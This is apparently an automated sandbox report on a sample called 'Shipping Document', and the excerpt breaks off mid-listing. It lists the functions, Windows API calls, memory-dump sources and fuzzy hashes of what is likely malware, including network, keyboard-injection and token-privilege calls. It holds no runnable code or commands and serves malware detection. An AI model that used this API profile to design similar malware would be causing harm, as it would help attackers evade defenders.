Instruction Fuzzy Hash: B95141B4900209EFDF21DF58D9C0AAE7BF5FB48324F1082B9F99597291D731A951CB90

Function 01036CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 01036CE4
WSAGetLastError.WSOCK32(00000000), ref: 01036CF4

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01036D58
WSAGetLastError.WSOCK32(00000000), ref: 01036D64

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 05e5714e24a240ab1e0b166f3b3205aa4122b7858d2c75b2a4e95ff3b2437f32
Instruction ID: a6f320c4353b3f2ccc1c3df6dabf32d8c08c7545c258500df031fd3d3b7e9b4f
Opcode Fuzzy Hash: 05e5714e24a240ab1e0b166f3b3205aa4122b7858d2c75b2a4e95ff3b2437f32
Instruction Fuzzy Hash: B041D774740201AFEB20AF28DD8BF7A77E99F44B10F44805CFA599F2C2DAB99D019751

Function 0103672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0104F910), ref: 010367BA
_strlen.LIBCMT ref: 010367EC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 02a021942562384891df4dd9385be042f7228bd4fd21bb78eb8a06445481db8f
Instruction ID: dc7f5cd165432c3ddc25d1df999d20baf6666e0f76eafa5fb64519618fc33618
Opcode Fuzzy Hash: 02a021942562384891df4dd9385be042f7228bd4fd21bb78eb8a06445481db8f
Instruction Fuzzy Hash: BE41F575A00106BFCB14EB69CDC5FAEB3ADAF88310F048259F9559B292DF75AE40C750

Function 0102BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0102BB09
GetLastError.KERNEL32(?,00000000), ref: 0102BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0102BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0102BB80

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: ce016cb6b8042d43590f06e2bb33911600066714f917efbbe22262e54051c879
Instruction ID: afd9652f320171d933728f28fd46b59fe72a64cd03834cf282d123965fe78b7f
Opcode Fuzzy Hash: ce016cb6b8042d43590f06e2bb33911600066714f917efbbe22262e54051c879
Instruction Fuzzy Hash: BB415139200512DFCB21DF19C689E5DBBE1EF49710B058488ED8A9B762CB78FD01DB91

Function 01048AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01048B4D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 261b271e898dbf09b28aa8ccb98e8fcb67afd164636a68053f98342f80e506fc
Instruction ID: 608d71346bbbf1fe6cec0a6d0f9813e27151ca43d0826d4c6095228009aafbb3
Opcode Fuzzy Hash: 261b271e898dbf09b28aa8ccb98e8fcb67afd164636a68053f98342f80e506fc
Instruction Fuzzy Hash: E131ADF4644204BFEB619AACCCC5FAD3BA4EB09320F14CE67FBD1D6291C635A5508B81

Function 0104ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0104AE1A
GetWindowRect.USER32(?,?), ref: 0104AE90
PtInRect.USER32(?,?,0104C304), ref: 0104AEA0
MessageBeep.USER32(00000000), ref: 0104AF11

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 37850da33febc5705a94ef436f28bcf04d8703b137bd9dc29b9cc02beb331964
Instruction ID: 5826e397cb91ded9249cb000bb3de181fa81306bcb7e796822418bc5b6faa7da
Opcode Fuzzy Hash: 37850da33febc5705a94ef436f28bcf04d8703b137bd9dc29b9cc02beb331964
Instruction Fuzzy Hash: AB418FB4744106DFDB21CF59C4C4A9D7BF5FB49340F1581B9E9AA8B245D732A842CB50

Function 01020FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01021037
SetKeyboardState.USER32(00000080,?,00000001), ref: 01021053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010210B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0102110B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5ba0c45b57ec68edc783a07b3784a9fa5d12b00dfa8ee093e75ac9168666320f
Instruction ID: 073ae2490bf451b3f6e038e2d8b4efc3aa535aa49a140c459befc02a0e3f04a4
Opcode Fuzzy Hash: 5ba0c45b57ec68edc783a07b3784a9fa5d12b00dfa8ee093e75ac9168666320f
Instruction Fuzzy Hash: 8F313970F446A8AEFB318A6D8C44BFEBBE9AF44310F04435AF6C0521D1C3BD45818791

Function 01021121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 01021176
SetKeyboardState.USER32(00000080,?,00008000), ref: 01021192
PostMessageW.USER32(00000000,00000101,00000000), ref: 010211F1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 01021243

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 22fab8fef5f0e295ad8afca6c4e5293056e9668456d87f9ed63eb8d51e7a137d
Instruction ID: 7b011da4478fe7d153566581b19c9936cbfbd359de9a8da92ad761e2da187a06
Opcode Fuzzy Hash: 22fab8fef5f0e295ad8afca6c4e5293056e9668456d87f9ed63eb8d51e7a137d
Instruction Fuzzy Hash: 68312670A407286EFF318A6D8804BFEBBFAAB49310F14439AF5C4925D5C37986558791

Function 00FF6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FF644B
__isleadbyte_l.LIBCMT ref: 00FF6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FF64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FF64DD

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e2d1a65f2962f47ce78d923b4c90d7bc1312d3052951433d5002214cb312a7ca
Instruction ID: c25730ce1d82335b599cbe260d34b45ee38a28258385dcfa58cd8d91da05767e
Opcode Fuzzy Hash: e2d1a65f2962f47ce78d923b4c90d7bc1312d3052951433d5002214cb312a7ca
Instruction Fuzzy Hash: 6331AD31A0024AAFDB21EF65CC85BBA7BB5FF41320F154029EA64D71B1EB35D850EB90

Function 01045175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01045189

Part of subcall function 0102387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01023897
Part of subcall function 0102387D: GetCurrentThreadId.KERNEL32 ref: 0102389E
Part of subcall function 0102387D: AttachThreadInput.USER32(00000000,?,010252A7), ref: 010238A5

GetCaretPos.USER32(?), ref: 0104519A
ClientToScreen.USER32(00000000,?), ref: 010451D5
GetForegroundWindow.USER32 ref: 010451DB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: ed7c5a08652e758b17cfbf6efc0105cc5c5cdf42e2d0d11401e8e04fca04d3b9
Instruction ID: 388eb24d1dda0960efb08a3536c6704ec2e2032c199ef26a8cb53f794e993a72
Opcode Fuzzy Hash: ed7c5a08652e758b17cfbf6efc0105cc5c5cdf42e2d0d11401e8e04fca04d3b9
Instruction Fuzzy Hash: 50312175900109AFDB10EFA5CD85EEFB7F9EF98300F10406AE455E7241EA799E05CBA0

Function 0104C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

GetCursorPos.USER32(?), ref: 0104C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FFBBFB,?,?,?,?,?), ref: 0104C7D7
GetCursorPos.USER32(?), ref: 0104C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FFBBFB,?,?,?), ref: 0104C85E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: e6e38cce01862684d0e1ac798396437306e505b19b51f8bc48297efb4ec53190
Instruction ID: 52eb2e5787fd595b92950a9bb0db79877fcc0192100a7e32ffa773da0c161f82
Opcode Fuzzy Hash: e6e38cce01862684d0e1ac798396437306e505b19b51f8bc48297efb4ec53190
Instruction Fuzzy Hash: F131E175601018AFEB25CF4CC9D8EEA7BF6FB09320F0440A9FA858B251D7369950DFA0

Function 01018B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01018652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01018669
Part of subcall function 01018652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01018673
Part of subcall function 01018652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01018682
Part of subcall function 01018652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01018689
Part of subcall function 01018652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 01018BEB
_memcmp.LIBCMT ref: 01018C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01018C44
HeapFree.KERNEL32(00000000), ref: 01018C4B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 9868f059cd2ac16d81ebd75eee3a00df33288d257773df7604f192be39ddf26f
Instruction ID: d9fe4dd7ac8745e640e42eb74634aab3547613f7a86533fc30c5f4f3914e4c69
Opcode Fuzzy Hash: 9868f059cd2ac16d81ebd75eee3a00df33288d257773df7604f192be39ddf26f
Instruction Fuzzy Hash: A7216D71E01209ABDB10DF98C944BEEB7F8FF44354F14809AE994A7244D739AA05CB50

Function 00FE0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00FE0BF2

Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0

_fprintf.LIBCMT ref: 00FE0C29
OutputDebugStringW.KERNEL32(?), ref: 01016331

Part of subcall function 00FE4CDA: _flsall.LIBCMT ref: 00FE4CF3

__setmode.LIBCMT ref: 00FE0C5E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: fa292773220f3052e9d73a0a4e398f851a21d0250dee7f15150a9cb962035c14
Instruction ID: 60fcb7a68b789ed8b623ac34c8ad16572f399129426d0b107ed910473caea12a
Opcode Fuzzy Hash: fa292773220f3052e9d73a0a4e398f851a21d0250dee7f15150a9cb962035c14
Instruction Fuzzy Hash: B3113A32A042457BCB04B7BAAC47EBE7B699F41320F24415EF104971C2DE792D816791

Function 01031A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01031A97

Part of subcall function 01031B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01031B40
Part of subcall function 01031B21: InternetCloseHandle.WININET(00000000), ref: 01031BDD

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 33de4ac9abaaa790e5e809277d00dc19ff3377cf2f4bed717f221cf1c20a98f3
Instruction ID: 70454c2e1f6e08ff9f71416db47bbafacabd9e5612869b75e91d46e00d3ab835
Opcode Fuzzy Hash: 33de4ac9abaaa790e5e809277d00dc19ff3377cf2f4bed717f221cf1c20a98f3
Instruction Fuzzy Hash: E521A475200601BFEB169F648C00FBBBBEDFF8C601F00401AFA91D6550E775D41197A0

Function 0101E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0101F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0101E1C4,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?), ref: 0101F5BC
Part of subcall function 0101F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0101F5E2
Part of subcall function 0101F5AD: lstrcmpiW.KERNEL32(00000000,?,0101E1C4,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?), ref: 0101F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0101E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0101E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0101EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0101E237

Strings

cdecl, xrefs: 0101E22E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: a17596904a8a8e4e0ce3036ea4bba76c894c1702e7caa45a8dcdadc5c672175b
Instruction ID: a077e7d043f3473b0d79dadbc821d8a15dfe41fae2aadc9314d3547cb39894b9
Opcode Fuzzy Hash: a17596904a8a8e4e0ce3036ea4bba76c894c1702e7caa45a8dcdadc5c672175b
Instruction Fuzzy Hash: 3511D33A200342EFCB26AF68D844DBE77E8FF45310B40802AED46CB258EB75D850D790

Function 00FF5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FF5351

Part of subcall function 00FE594C: __FF_MSGBANNER.LIBCMT ref: 00FE5963
Part of subcall function 00FE594C: __NMSG_WRITE.LIBCMT ref: 00FE596A
Part of subcall function 00FE594C: RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 938e1635e9c9faaa18cb7c40eb0ecd8da8aa74371de984fe2c4a3add4ff78a99
Instruction ID: 11288a9f0f2a6785d9141f3e5dedafc3be6d8d1ed4ab73f6fb76670d70f2d888
Opcode Fuzzy Hash: 938e1635e9c9faaa18cb7c40eb0ecd8da8aa74371de984fe2c4a3add4ff78a99
Instruction Fuzzy Hash: 8A11E732904A1AAFCB313FB9EC4477D37995F10BF1F144429FB889A1A1DE7A8941B750

Function 00FC4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC4560

Part of subcall function 00FC410D: _memset.LIBCMT ref: 00FC418D
Part of subcall function 00FC410D: _wcscpy.LIBCMT ref: 00FC41E1
Part of subcall function 00FC410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FC41F1

KillTimer.USER32(?,00000001,?,?), ref: 00FC45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FC45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FFD6CE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f9cd1f62cf06ab2d109e3c7c9a1e90c37fd64b62d9e849f9012db05bed7714b2
Instruction ID: 49d2b9c5e4b41842d745df90dbed757199921130c054f50acae55f16ea55c0ce
Opcode Fuzzy Hash: f9cd1f62cf06ab2d109e3c7c9a1e90c37fd64b62d9e849f9012db05bed7714b2
Instruction Fuzzy Hash: 05212571904788AFEB328B248956FF6BBEC9F01318F04009DE3DE96245C7792A84AB41

Function 010240B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 010240D1
_memset.LIBCMT ref: 010240F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 01024144
CloseHandle.KERNEL32(00000000), ref: 0102414D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
